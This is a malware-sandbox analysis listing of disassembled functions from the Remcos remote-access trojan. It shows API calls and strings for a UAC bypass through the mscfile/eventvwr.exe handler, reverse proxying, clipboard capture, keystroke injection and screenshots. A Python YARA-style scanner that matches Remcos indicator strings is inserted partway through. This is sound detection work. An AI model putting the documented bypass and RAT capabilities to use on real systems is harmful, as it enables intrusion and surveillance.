            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
            • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
            • String ID: 05#v`#v$H"G$H"G
            • API String ID: 3795512280-268818530
            • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
            • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
            • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
            • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
            APIs
            • SetEvent.KERNEL32(?,?), ref: 0040549F
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
            • TranslateMessage.USER32(?), ref: 0040555E
            • DispatchMessageA.USER32(?), ref: 00405569
            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
            • String ID: CloseChat$DisplayMessage$GetMessage
            • API String ID: 2956720200-749203953
            • Opcode ID: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
            • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
            • Opcode Fuzzy Hash: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
            • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
            APIs
              • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
            • CloseHandle.KERNEL32(00000000), ref: 00416123
            • DeleteFileA.KERNEL32(00000000), ref: 00416132
            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
            • String ID: <$@$@%G$@%G$Temp
            • API String ID: 1704390241-4139030828
            • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
            • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
            • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
            • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
            • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
            • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
            • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
            APIs
            • _free.LIBCMT ref: 00445645
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00445651
            • _free.LIBCMT ref: 0044565C
            • _free.LIBCMT ref: 00445667
            • _free.LIBCMT ref: 00445672
            • _free.LIBCMT ref: 0044567D
            • _free.LIBCMT ref: 00445688
            • _free.LIBCMT ref: 00445693
            • _free.LIBCMT ref: 0044569E
            • _free.LIBCMT ref: 004456AC
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
            • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
            • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
            • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
            APIs
            • __EH_prolog.LIBCMT ref: 00417F6F
            • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
            • Sleep.KERNEL32(000003E8), ref: 004180B3
            • GetLocalTime.KERNEL32(?), ref: 004180BB
            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
            • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
            • API String ID: 489098229-3790400642
            • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
            • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
            • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
            • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
            APIs
            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: DecodePointer
            • String ID: acos$asin$exp$log$log10$pow$sqrt
            • API String ID: 3527080286-3064271455
            • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
            • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
            • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
            • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
            APIs
            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            • Sleep.KERNEL32(00000064), ref: 00415A46
            • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: File$CreateDeleteExecuteShellSleep
            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
            • API String ID: 1462127192-2001430897
            • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
            • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
            • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
            • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
            APIs
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
            • ExitProcess.KERNEL32 ref: 00406782
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: ExecuteExitProcessShell
            • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
            • API String ID: 1124553745-1488154373
            • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
            • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
            • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
            • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
            APIs
            • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
            • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: AllocConsoleShowWindow
            • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
            • API String ID: 4118500197-4025029772
            • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
            • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
            • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
            • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
              • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
              • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
              • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
            • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
            • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
            • TranslateMessage.USER32(?), ref: 0041B29E
            • DispatchMessageA.USER32(?), ref: 0041B2A8
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
            • String ID: Remcos
            • API String ID: 1970332568-165870891
            • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
            • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
            • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
            • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
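The two functions above (the console banner at 0041AA5D and the tray icon at 0041B22B) expose the clearest identifying strings in the unpacked image at 00400000: the "* Remcos v" / "3.8.0 Pro" banner, the "BreakingSecurity.net" vendor line, the "Remcos" tray label, and the command names recovered elsewhere in this dump (CloseChat, DisplayMessage, GetDirectListeningPort, StartReverse, the wnd_/time_ screenshot format, the mscfile handler path). The following is an added example, not code from the Joe Sandbox report or from the sample: a small YARA-style scanner in Python that looks for those strings in a memory image and pulls the version out of the banner. The indicator list is copied from the report's String ID fields; the byte buffer it scans is a constructed stand-in for the 00400000 dump, not real dump contents, and the minimum-hit threshold is an assumption chosen so that the generic "Remcos" label alone cannot produce a verdict.

```python
"""Added example (not from the Joe Sandbox report or the sample): YARA-style
string scan of a memory image for the Remcos indicators this report lists.
The buffer scanned below is constructed; only the needle strings come from
the report's String ID fields."""
import re

# Indicator strings quoted in the report, as plain ANSI byte strings.
REMCOS_STRINGS = {
    "banner_vendor": b"BreakingSecurity.net",
    "banner_version": b"Remcos v",
    "tray_name": b"Remcos",
    "chat_cmd_close": b"CloseChat",
    "chat_cmd_display": b"DisplayMessage",
    "tunnel_cmd_port": b"GetDirectListeningPort",
    "tunnel_cmd_reverse": b"StartReverse",
    "screenshot_fmt": b"wnd_%04i%02i%02i_%02i%02i%02i",
    "ie_cookie_msg": b"[IE cookies cleared!]",
    "uac_bypass_key": b"mscfile\\shell\\open\\command",
}

# The banner prints "* Remcos v" and then the version string ("3.8.0 Pro" in
# this sample). The optional trailing word is the edition as printed.
VERSION_RE = re.compile(rb"Remcos v\s*(\d+\.\d+\.\d+)\s*([A-Za-z]+)?")


def scan(buf: bytes, min_hits: int = 4) -> dict:
    """Return the indicators found (name -> first offset), the banner
    version/edition if present, and a verdict. 'remcos' requires at least
    min_hits distinct indicators (assumed threshold) so that the bare tray
    label "Remcos" in some unrelated buffer is not enough."""
    hits = {}
    for name, needle in REMCOS_STRINGS.items():
        off = buf.find(needle)
        if off != -1:
            hits[name] = off
    m = VERSION_RE.search(buf)
    version = m.group(1).decode() if m else None
    edition = m.group(2).decode() if m and m.group(2) else None
    return {
        "hits": hits,
        "version": version,
        "edition": edition,
        "verdict": "remcos" if len(hits) >= min_hits else "inconclusive",
    }


# Constructed stand-in for the 00400000 region: the console banner laid out
# the way the strings suggest it is assembled, plus command names separated
# by NUL bytes and some filler. This is NOT real dump content.
FAKE_DUMP = (
    b"\x00" * 64
    + b"--------------------------\n * Remcos v3.8.0 Pro\n * BreakingSecurity.net\n"
    + b"--------------------------\nCONOUT$\x00"
    + b"\x90" * 32
    + b"CloseChat\x00DisplayMessage\x00GetMessage\x00"
    + b"GetDirectListeningPort\x00StartForward\x00StartReverse\x00"
    + b"wnd_%04i%02i%02i_%02i%02i%02i\x00time_%04i%02i%02i_%02i%02i%02i\x00"
    + b"Software\\Classes\\mscfile\\shell\\open\\command\x00eventvwr.exe\x00"
    + b"Remcos\x00"
)

if __name__ == "__main__":
    result = scan(FAKE_DUMP)
    print(result["verdict"], result["version"], result["edition"])
    for name, off in sorted(result["hits"].items(), key=lambda kv: kv[1]):
        print(f"  {name:<20} @ 0x{off:08x}")
```

On a real case the buffer would be the process memory region the report names (the 00400000 image of process 14, dumped with a debugger or from the sandbox's memory dump), and the threshold should be tuned against your own clean corpus; the banner regex is only a convenience for pulling the version out of a hit, not a detection on its own.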
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
            • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
            • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
            • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
            APIs
            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
            • __alloca_probe_16.LIBCMT ref: 004510CA
            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
            • __alloca_probe_16.LIBCMT ref: 00451174
            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
            • __freea.LIBCMT ref: 004511E3
            • __freea.LIBCMT ref: 004511EF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
            • String ID:
            • API String ID: 201697637-0
            • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
            • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
            • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
            • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • _memcmp.LIBVCRUNTIME ref: 00442935
            • _free.LIBCMT ref: 004429A6
            • _free.LIBCMT ref: 004429BF
            • _free.LIBCMT ref: 004429F1
            • _free.LIBCMT ref: 004429FA
            • _free.LIBCMT ref: 00442A06
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: _free$ErrorLast$_abort_memcmp
            • String ID: C
            • API String ID: 1679612858-1037565863
            • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
            • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
            • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
            • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID:
            • String ID: tcp$udp
            • API String ID: 0-3725065008
            • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
            • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
            • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
            • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: Eventinet_ntoa
            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
            • API String ID: 3578746661-168337528
            • Opcode ID: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
            • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
            • Opcode Fuzzy Hash: 91f6b250a27052f763f33f931300f679483c58cf17455d7b6bb400d635c1d2e1
            • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
            APIs
            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
              • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
              • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
            • String ID: .part
            • API String ID: 1303771098-3499674018
            • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
            • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
            • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
            • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
            APIs
            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
            • __alloca_probe_16.LIBCMT ref: 00447056
            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
            • __alloca_probe_16.LIBCMT ref: 0044713B
            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
            • __freea.LIBCMT ref: 004471AB
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • __freea.LIBCMT ref: 004471B4
            • __freea.LIBCMT ref: 004471D9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
            • String ID:
            • API String ID: 3864826663-0
            • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
            • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
            • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
            • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
            APIs
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
            • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
            • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            • API ID: InputSend
            • String ID:
            • API String ID: 3431551938-0
            • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
            • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
            • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
            • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
            APIs
            • OpenClipboard.USER32 ref: 00414F41
            • EmptyClipboard.USER32 ref: 00414F4F
            • CloseClipboard.USER32 ref: 00414F55
            • OpenClipboard.USER32 ref: 00414F5C
            • GetClipboardData.USER32(0000000D), ref: 00414F6C
            • GlobalLock.KERNEL32(00000000), ref: 00414F75
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
            • CloseClipboard.USER32 ref: 00414F84
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
